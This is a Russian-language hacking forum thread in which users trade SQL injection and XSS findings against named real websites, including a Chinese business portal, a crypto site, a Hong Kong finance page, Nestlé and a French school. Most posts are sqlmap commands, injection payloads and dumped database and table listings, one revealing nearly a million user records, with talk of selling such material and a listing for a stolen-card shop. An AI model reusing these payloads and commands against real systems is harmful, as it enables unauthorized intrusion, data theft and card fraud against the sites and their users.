- Автор темы
- Добавить закладку
- #81
От тебя еще ничего полезного на форум не было выложено, языками чесать все могут.
А тем более ты просишь что бы люди тебе бесплатно скидывали материал, что бы ты продавал...
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Найденные интересеные SQL inj & XSS
- Автор темы Xrenovi4
- Дата начала
А тем более ты просишь что бы люди тебе бесплатно скидывали материал, что бы ты продавал...
Подразумевается что будем выкупать. Полезность понятие относительное. Выложу инЬекций как до компа доберусь
До сих пор добирается)
Хард с базами в другом городе, придется подождать
Очень похоже на правду, пожалуй я тебе верю , а то мы тут шлак выкладываем!
Посмотрим на твою годноту)
- Автор темы
- Добавить закладку
- #87
POST /msg/login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=vfas2epei0a10pedfdcldjrn62;WeiLong=qg2p80gb5fn80bpk52nj0n2k63;bshare_off=true
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 378
Host: www.vlongbiz.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Submit=%B5%C7%C2%BC&u_password=pwd&u_user=1*
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=vfas2epei0a10pedfdcldjrn62;WeiLong=qg2p80gb5fn80bpk52nj0n2k63;bshare_off=true
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 378
Host: www.vlongbiz.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Submit=%B5%C7%C2%BC&u_password=pwd&u_user=1*
Код:
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Submit=%B5%C7%C2%BC&u_password=g00dPa$$w0rD&u_user=' AND 1747=(SELECT (CASE WHEN (1747=1747) THEN 1747 ELSE (SELECT 4815 UNION SELECT 8580) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: Submit=%B5%C7%C2%BC&u_password=g00dPa$$w0rD&u_user=' AND (SELECT 9688 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(9688=9688,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RRFl
---
back-end DBMS: MySQL >= 5.0
available databases [4]:
[*] bbs
[*] information_schema
[*] mysql
[*] vlongbiz
Database: vlongbiz
[121 tables]
+----------------------------+
| nouser |
| vcompany |
| vdemand |
| vproduct |
| vpurvey |
| wl_affiche |
| wl_agent_company |
| wl_agent_personal |
| wl_appraise |
| wl_area_list |
| wl_baduser |
| wl_batch_apply_dateline |
| wl_bizclub |
| wl_cache_state |
| wl_clients |
| wl_comment |
| wl_commerce |
| wl_commerce_2008 |
| wl_commerce_20090701 |
| wl_commerce_20090930 |
| wl_commerce_20100401 |
| wl_commerce_20100830 |
| wl_commerce_20111231 |
| wl_commerce_20120501 |
| wl_commerce_20120801 |
| wl_commerce_bak |
| wl_commerce_count_demand |
| wl_commerce_count_purvey |
| wl_commerce_demand_new |
| wl_commerce_demand_new_bak |
| wl_commerce_index |
| wl_commerce_main |
| wl_commerce_purvey_new |
| wl_commerce_purvey_new_bak |
| wl_commerce_recommend |
| wl_commerce_special |
| wl_commerce_to_sort_demand |
| wl_commerce_to_sort_purvey |
| wl_commerce_to_user_demand |
| wl_commerce_to_user_purvey |
| wl_company |
| wl_company_article |
| wl_company_copy1 |
| wl_company_count |
| wl_company_honor |
| wl_company_index |
| wl_company_notability |
| wl_company_recommend |
| wl_company_template |
| wl_company_template_sort |
| wl_company_to_sort |
| wl_company_to_ware_sort |
| wl_company_ware_sort |
| wl_company_ware_sort_index |
| wl_count_bak |
| wl_countdetail |
| wl_counter |
| wl_counter_to_userinfo |
| wl_datastore |
| wl_friendlink |
| wl_friendlink_sort |
| wl_friendlink_to_sort |
| wl_group |
| wl_group_to_popedom |
| wl_group_to_user |
| wl_guestbook |
| wl_help |
| wl_help_to_sort |
| wl_hot_word |
| wl_industry |
| wl_industry_count |
| wl_industry_index |
| wl_industry_index_1 |
| wl_industry_index_copy |
| wl_info_article_index |
| wl_info_article_sort |
| wl_info_article_time |
| wl_job |
| wl_keyword |
| wl_keyword_to_sort |
| wl_license |
| wl_log |
| wl_mailtemplate |
| wl_member_affiche |
| wl_message |
| wl_message_blacklist |
| wl_msg_link |
| wl_msg_popedom |
| wl_msg_user |
| wl_msgbook |
| wl_news_article |
| wl_news_article_sort |
| wl_news_article_to_sort |
| wl_online_message |
| wl_online_topic |
| wl_online_user |
| wl_online_user_to_topic |
| wl_popedom |
| wl_position |
| wl_recruitment |
| wl_recruitment_to_user |
| wl_search_key |
| wl_searcher_order |
| wl_service |
| wl_service_oa |
| wl_service_order |
| wl_service_to_user |
| wl_sessions |
| wl_usergroup |
| wl_userinfo |
| wl_userinfo_copy |
| wl_userinfo_copy1 |
| wl_ware |
| wl_ware_count |
| wl_ware_count_copy |
| wl_ware_detail |
| wl_ware_index |
| wl_ware_new |
| wl_ware_recommend |
| wl_ware_to_company |
| wl_ware_to_sort |
+----------------------------+
Database: vlongbiz
Table: wl_userinfo
[39 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| domain | varchar(255) |
| c_id | varchar(32) |
| icp | varchar(50) |
| old_c_free_id | int(10) unsigned |
| old_c_id | int(10) unsigned |
| old_id | int(10) unsigned |
| u_accounts | varchar(16) |
| u_active | varchar(1) |
| u_answer | varchar(255) |
| u_areafax | varchar(8) |
| u_areaphone | varchar(8) |
| u_bbsusername | varchar(50) |
| u_buyword | varchar(32) |
| u_corpaddress | varchar(255) |
| u_corparea | mediumint(9) |
| u_corpname | varchar(96) |
| u_department | varchar(32) |
| u_email | varchar(128) |
| u_fax | varchar(16) |
| u_group | tinyint(3) unsigned |
| u_id | char(32) |
| u_logindate | datetime |
| u_loginip | varchar(16) |
| u_loginnum | mediumint(8) unsigned |
| u_mobphone | varchar(16) |
| u_name | varchar(32) |
| u_password | varchar(16) |
| u_phone | varchar(16) |
| u_position | varchar(64) |
| u_postcode | varchar(8) |
| u_proposer | varchar(16) |
| u_question | varchar(255) |
| u_regdate | datetime |
| u_regip | varchar(16) |
| u_saleword | varchar(32) |
| u_sex | enum('m','f') |
| u_sign | enum('1','0') |
| u_template | varchar(10) |
| u_trade | varchar(32) |
+---------------+-----------------------+
Database: vlongbiz
+-------------+---------+
| Table | Entries |
+-------------+---------+
| wl_userinfo | 947595 |
+-------------+---------+
У меня такой вопрос, вы сами payload'ы перебираете? Если к примеру большую часть - нет. То покажите, что сами перебрали. Просто интересно=)
И еще маленькая просьба, ставить основную ссылку ну полную со всеми .php?id=411 и т.п на первую строчку. А потом сам пойлоад под спойлер. Дабы не видеть своего рода ответ и самому перебрать
И еще маленькая просьба, ставить основную ссылку ну полную со всеми .php?id=411 и т.п на первую строчку. А потом сам пойлоад под спойлер. Дабы не видеть своего рода ответ и самому перебрать
Немного крипты, так сказать разбавить будни) Метод слип!
(Для особо ленивых) sqlmap -u "https://www.cryptobooost.com/login.php" --data="id=4664&password=" -p id --random-agent --risk 3 --dbs
Если не получаеться пихаем по этому пути /root/.sqlmap/output/ вот эту папку https://anonfile.com/p6FeGe0cod/www.cryptobooost.com_zip и запускаем мапу с командой которую пысал выше
*Это путь в кали /root/.sqlmap/output/ как там на ваших "виндовсах" без понятия)
(Для особо ленивых) sqlmap -u "https://www.cryptobooost.com/login.php" --data="id=4664&password=" -p id --random-agent --risk 3 --dbs
Если не получаеться пихаем по этому пути /root/.sqlmap/output/ вот эту папку https://anonfile.com/p6FeGe0cod/www.cryptobooost.com_zip и запускаем мапу с командой которую пысал выше
*Это путь в кали /root/.sqlmap/output/ как там на ваших "виндовсах" без понятия)
Parameter: id (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-3417' OR 5762=5762-- hrtW&password=g00dPa574764w0rD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=-1' AND (SELECT 8478 FROM (SELECT(SLEEP(5)))JKOG)-- ChcU&password=g00dPa574764w0rD
---
web application technology: Apache, PHP, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] cryptobo_2booosta
[*] information_schema
sqlmap resumed the following injection point(s) from stored session:
---
web application technology: Apache, PHP, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
Database: cryptobo_2booosta
[57 tables]
+-------------------+
| transaction |
| adminsettings |
| badminsettings |
| banners |
| cause |
| cause_logs |
| cause_setting |
| cause_transaction |
| coin_logs |
| coinpayment |
| coinsettings |
| matrix1 |
| matrix10 |
| matrix11 |
| matrix12 |
| matrix13 |
| matrix14 |
| matrix15 |
| matrix16 |
| matrix17 |
| matrix18 |
| matrix19 |
| matrix2 |
| matrix20 |
| matrix21 |
| matrix22 |
| matrix23 |
| matrix24 |
| matrix25 |
| matrix26 |
| matrix27 |
| matrix28 |
| matrix29 |
| matrix3 |
| matrix30 |
| matrix4 |
| matrix5 |
| matrix6 |
| matrix7 |
| matrix8 |
| matrix9 |
| membersbanners |
| membershiplevels |
| memberstextads |
| memberwallet |
| pages |
| piflogs |
| sbadminsettings |
| smembersbanners |
| soloads |
| tadminsettings |
| testimonials |
| tlogs |
| topref |
| transactionf |
| users |
| wtransaction |
+-------------------+
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-3417' OR 5762=5762-- hrtW&password=g00dPa574764w0rD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=-1' AND (SELECT 8478 FROM (SELECT(SLEEP(5)))JKOG)-- ChcU&password=g00dPa574764w0rD
---
web application technology: Apache, PHP, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] cryptobo_2booosta
[*] information_schema
sqlmap resumed the following injection point(s) from stored session:
---
web application technology: Apache, PHP, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
Database: cryptobo_2booosta
[57 tables]
+-------------------+
| transaction |
| adminsettings |
| badminsettings |
| banners |
| cause |
| cause_logs |
| cause_setting |
| cause_transaction |
| coin_logs |
| coinpayment |
| coinsettings |
| matrix1 |
| matrix10 |
| matrix11 |
| matrix12 |
| matrix13 |
| matrix14 |
| matrix15 |
| matrix16 |
| matrix17 |
| matrix18 |
| matrix19 |
| matrix2 |
| matrix20 |
| matrix21 |
| matrix22 |
| matrix23 |
| matrix24 |
| matrix25 |
| matrix26 |
| matrix27 |
| matrix28 |
| matrix29 |
| matrix3 |
| matrix30 |
| matrix4 |
| matrix5 |
| matrix6 |
| matrix7 |
| matrix8 |
| matrix9 |
| membersbanners |
| membershiplevels |
| memberstextads |
| memberwallet |
| pages |
| piflogs |
| sbadminsettings |
| smembersbanners |
| soloads |
| tadminsettings |
| testimonials |
| tlogs |
| topref |
| transactionf |
| users |
| wtransaction |
+-------------------+
Последнее редактирование:
- Автор темы
- Добавить закладку
- #90
恆指牛熊 | 窩輪/牛熊 - now.com 財經 Now finance
finance.now.com
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: http://finance.now.com:80/warrant/?range=-9546 OR 6944=(SELECT (CAS
E WHEN (6944=6944) THEN 6944 ELSE (SELECT 3342 UNION SELECT 3343) END))-- CujT&t
ype=C
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://finance.now.com:80/warrant/?range=(CASE WHEN (5419=5419) THE
N SLEEP(5) ELSE 5419 END)&type=C
---
[04:31:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
available databases [3]:
[*] information_schema
[*] pccw_finance
[*] test
Thanks!
Кто-нибудь видел бы подвиг на сайте bureau-vallee.fr. Они только что объявили о взломе. "Мы хотели написать вам о недавнем инциденте в сфере кибербезопасности в Бюро Долины". Нынешний кризис в области здравоохранения стал свидетелем взрыва кибер-атак. К сожалению, у нас нет иммунитета".
- Автор темы
- Добавить закладку
- #93
Cc shop,cvv / dump shop - online
Dumps shop. Here you can buy fresh Dumps, CC, CC+CVV, Dumps+PIN. Weekly updates, first hand stuff.
shop.cc-shop.su
Код:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: password='XOR (CASE WHEN (8803=8803) THEN SLEEP(5) ELSE 8803 END)XOR'Z
Vector: (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)
---
back-end DBMS: MySQL >= 5.0.12Команда для sqlmap
-u https://shop.cc-shop.su/login/auth --method POST --data=password=e -p password --prefix='XOR --suffix=XOR'Z --risk=3 --level=5
Скрытый контент для пользователей: .
О, неплохая тема))
XSS
У вас должно быть более 30 сообщений для просмотра скрытого контента.
https://www.nestle.com/jobs/search-jobs?keyword=&country=&location=&career_area=All&company="><script >alert(String.fromCharCode(88,83,83))</script>&order=title&sort=desc&page=210
https://college-aunay.etab.ac-caen.fr/spip.php?page="><script >alert(String.fromCharCode(88,83,83))</script>&url=./
https://college-aunay.etab.ac-caen.fr/spip.php?page="><script >alert(String.fromCharCode(88,83,83))</script>&url=./
Последнее редактирование:
Какие то читы
Доставка еды
Код:
--url "https://novapays.ru/article.php?id=1" --dbs --threads 10 --batch --dbms=mysql --level 3 --risk 3
Код:
--url "https://fasteda.ru/search" --data="terms=*" --dbs --thread 10 dbms=mysql --level 3 --risk 3 --batch
Код:
POST /us/ajax/studio_search.ajax HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.videosz.com/
Cookie: se_id=0ca64b78b3a98c1c37149f0678b4bece;se_browser_type=desktop;se_site_id=1;se_visitor_session=1;se_link_id=1;se_first_visit=2020-06-27%2B08%253A53%253A24;se_url=http%253A%252F%252Fwww.videosz.com%252Fde%252Fajax%252Fcontact.ajax;se_pages_count=4169;se_referer=https%253A%252F%252Fwww.videosz.com%252Fde%252Fkontact;jwplayer.volume=NaN;jwplayer.qualityLabel=360p SD;jwplayer.mute=false;__cfduid=d8f08ebe8ab535df7f779182d978123221593266286
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 201
Host: www.videosz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-alive
cache=scenes%7C%7C1%7C0%7C0&ids=5%7C168%7C67%7C1%7C157%7C48%7C78%7C94%7C174%7C89%7C265%7C136%7C272%7C199%7C202%7C84%7C204%7C40%7C42%7C72%7C3'%20AND%203*2*1=6%20AND%20'000T1ux'='000T1ux&mode=get_related
В таблице user около 270000 строк
sqlmap -u "http://www.dgi.inpe.br/CDSR/cart-cwic.php?ID=4%INJECT HERE%&sceneid=P6AWIF32008820130521&prodid=&action=Delete" --unstable --exclude-sysdbs -o --threads=10 --random-agent --level=5 --risk=3 --eta --dbms=MYSQL
http://prntscr.com/taglxq имеем скулю. использовал эти тампера --tamper=space2comment.py --tamper=between.py --tamper=randomcase.py бд выводит все норм . но не выводит таблицы не одной из бд вот результат http://prntscr.com/tagjrs . не --hex --no-cast не чего не помогает
может кто то даст какой совет?
может кто то даст какой совет?